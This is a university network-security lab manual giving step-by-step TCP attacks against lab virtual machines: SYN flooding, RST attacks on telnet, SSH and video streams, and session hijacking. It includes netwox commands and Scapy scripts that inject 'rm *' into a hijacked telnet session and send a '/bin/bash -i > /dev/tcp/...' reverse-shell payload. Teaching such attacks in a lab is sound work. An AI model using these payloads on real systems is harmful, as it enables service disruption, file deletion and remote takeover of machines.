Manual-TCP Attack Lab
Manual-TCP Attack Lab
May 2021
Table of Contents
Contents
LAB SETUP 1
TASK 1: SYN FLOODING ATTACK 2
TASK 2: TCP RST ATTACKS ON TELNET AND SSH CONNECTIONS 3
TASK 3: TCP RST ATTACKS ON VIDEO STREAMING APPLICATIONS 5
TASK 4: TCP SESSION HIJACKING 5
TASK 5: CREATING REVERSE SHELL USING TCP SESSION HIJACKING 7
Lab Setup
Task 1
Attacker : 10.0.2.10
Victim : 10.0.2.11
Observer : 10.0.2.9
Task 3
Attacker : 10.0.2.9
Victim : 10.0.2.10
Computer Network Security |
May 2021
Using the below command, we turn off the SYN cookie countermeasure in the victim
machine.
Command:
sudo sysctl -w net.ipv4.tcp_syncookies=0
Next, we use netwox tool 76 for SYN flooding attacks on the victim's machine.
Command:
sudo apt -get install netwox (if netwox is not installed on vm)
After the attack, we can see many half-open connections from random source IP addresses.
Command:
netstat -tna
Provide a screenshot of your observations.
Once the quantity of this type of connection reaches a certain threshold, the victim will not
be able to accept any new TCP connections. When we try to telnet the victim, the connection
cannot be established.
Command:
telnet 10.0.2.11
Provide a screenshot of your observations.
On the observer machine, provide a screenshot of the packets on Wireshark. These SYN
packets are sent to the victim from random IP addresses. The victim replies with SYN+ACK
packets which may be dropped somewhere because the IP addresses may not be assigned to
any machine. Hence, the half-open connections will stay in the queue until they time out.
Computer Network Security |
May 2021
Provide a screenshot that shows the Wireshark capture of the SYN flooding attack. For a
detailed explanation of how SYN cookies work and how they protect against SYN flooding
attacks, please refer to the notes.
Netwox:
We do the RESET attack using netwox tool 40. On running the attack we can see that the
telnet connection is disconnected.
Command:
sudo netwox 40 -l 10.0.2.11 -m 10.0.2.10 -o 23 -p 36030 -B -q 1403610903 (this is my vm seq
no, and port number, please use your vm seq no and port number)
Computer Network Security |
May 2021
Provide a screenshot of the telnet connection getting disconnected on running the above
command. Provide supporting screenshots.
Provide a screenshot that shows the Wireshark packet for the RESET packet.
Scapy:
The following python script using scapy tool to send a Reset packet. In this script, we are
creating an IP packet and TCP segment (with RST flag) and sending it over the network. All the
necessary parameters like Source IP, Destin IP, Sequence number and Destin port etc are
retrieved from the last telnet packet sent by the server to the client as shown above.
reset_tcp.py
#!/usr/bin/python
import sys
from scapy.all import *
print("Sending reset packet")
IPLayer = IP(src="10.0.2.11" , dst="10.0.2.10")
TCPLayer = TCP(sport=23, dport=36072,flags="R" ,seq=812230484)
pkt = IPLayer/TCPLayer
ls(pkt)
send(pkt,verbose=0)
commands:
telnet
10.0.2.11
sudo python reset.py or sudo python3 reset.py
Provide the machine’s IP address where you will run telnet and resest.py commands.
Provide a screenshot of the telnet connection, provide screenshots of the script running and
the connection getting cut, provide a screenshot of the Wireshark Capture.
In the same way, we can do the RESET attack on ssh connections and give screenshots.
Netwox Command:
sudo netwox 40 -l 10.0.2.11 -m 10.0.2.10 -o 22 -p 43194 -B -q 3656719214
Provide screenshots of the command execution and corresponding Wireshark captures.
Note: -p has to be for your port number and -q is your Next Seq number.
Scapy:
Below is a python script to send a RESET packet to the client which has an established ssh
connection with the server.
reset_ssh.py
#!/usr/bin/python
import sys
from scapy.all import *
Computer Network Security |
May 2021
Show that the connection was lost with the ssh server when we run the script sending the
Reset packet to the client.
Command:
sudo python reset_ssh.py
Provide a screenshot of your observations.
Provide a screenshot of the Wireshark capture.
Netwox:
The RESET attack to the client who is connected to YouTube and streaming videos. The
streaming ends and throws an error once the attack is successful.
Command:
sudo netwox 78 --filter “src host 10.0.2.9”
(we can see buffering, but not the error message)
Provide a screenshot of your observations and show the streaming getting disrupted.
Note: You may need to wait for sometime for this to happen, refer Textbook if you want to
see how the output looks
Next, we establish a TCP connection with the server 10.0.2.11. We can see our file “new.txt”.
Command:
telnet
10.0.2.11 cd
TCP
ll
Note: The above ll is (LL in lower case)
Provide a screenshot of your observations. the screenshot of the last data packet sent to the
server machine. We will use the “Next Sequence Number and “Acknowledgement Number”
in the packet for our hijacking packet. The below netwox command is used for TCP session
hijacking. The tcp data section is hex representation of the string “\r rm *\n\r” (to delete all
the files in the current directory) which is sent a payload to the server where it is executed.
Next Seq Number is calculated by using Sequence number + Segment Len of the ‘TCP’ packet.
Not the one that says ‘Telnet’ in Wireshark
Netwox Command:
sudo netwox 40 --ip4-src “10.0.2.10” --ip4-dst “10.0.2.11 ” --ip4-ttl 64 --tcp-dst 23 --tcp-src
“44798” --tcp-seqnum “3912634967” --tcp-window 2000 --tcp-ack --tcp-acknum “
2846615940” --tcp-data “0d20726d202a0a0d”
(10.0.2.10 – source ip, 10.0.2.11 – des ip, 3912634967 Next Sequence Number, 2846615940
Acknowledgement Number”, “r rm *\n\r” 0d20726d202a0a0d)
Command:
telnet 10.0.2.11
ll
Provide a screenshot of your observations. Note: The above ll is (LL in lower case)
sessionhijack.py
#!/usr/bin/python
import sys
from scapy.all import *
print("Sending session hijacking packet ")
IPLayer = IP(src="10.0.2.10" , dst="10.0.2.11")
TCPLayer = TCP(sport=36724, dport=23,flags="A", seq=3298654989, ack=2893576955)
Data = "\r rm *\n\r"
pkt = IPLayer/TCPLayer/Data
ls(pkt)
send(pkt,verbose=0)
Show that on executing the script, the packet is sent to the server which freezes the telnet
communication.
Command:
sudo python sessionhijack.py
0d0a2f62696e2f62617368202d69203e202f6465762f7463702f31302e302e322e392f3930393020323e2
63120303c26310d0a
Use the YOUR hex string for the TCP data instead of ” \r /bin/bash -i > /dev/tcp/10.0.2.9/9090 2>&1
0<&1 \n”
On opening a nc listener on port 9090, we get a reverse shell of the server and the attacker
can run any commands on the server.
Command:
nc -lv 9090 (attacker vm) by opening it on another terminal
Scapy:
Below is the python script to hijack an established TCP session and run a reverse shell. In this
task, we provide the reverse shell command as payload data. This payload data is sent to the
telnet server which gets executed on the server.
reverseshell.py
#!/usr/bin/python
import sys
from scapy.all import *
print("Sending session hijacking packet ")
IPLayer = IP(src="10.0.2.10" , dst="10.0.2.11")
TCPLayer = TCP(sport=36848, dport=23, flags="A", seq=1337361290, ack=1955187868)
Data = "\r /bin/bash -i > /dev/tcp/10.0.2.9/9090 2>&1 0<&1\n"
pkt = IPLayer/TCPLayer/Data
Computer Network Security |
May 2021
ls(pkt)
send(pkt,verbose=0)
Show that on executing the script, the packet is sent to the server which freezes the telnet
communication. Note: You need to find the appropriate Seq and ack numbers here as well
Command:
sudo python reverseshell.py
Provide a screenshot of your observations.
On opening a nc listener on port 9090, we get a reverse shell of the server and the attacker
can run any commands on the server. We can verify it by running the ifconfig command.
Command:
nc -lv 9090
Provide a screenshot of your observations.
Note: The port number of server machine can be seen in attacker machine wireshark
Submission:
You need to submit a detailed lab report to describe what you have done and what you
have observed; you also need to provide explanations to the observations that are
interesting or surprising. Please also list the important code snippets followed by
explanation. Simply attaching code without any explanation will not receive credits.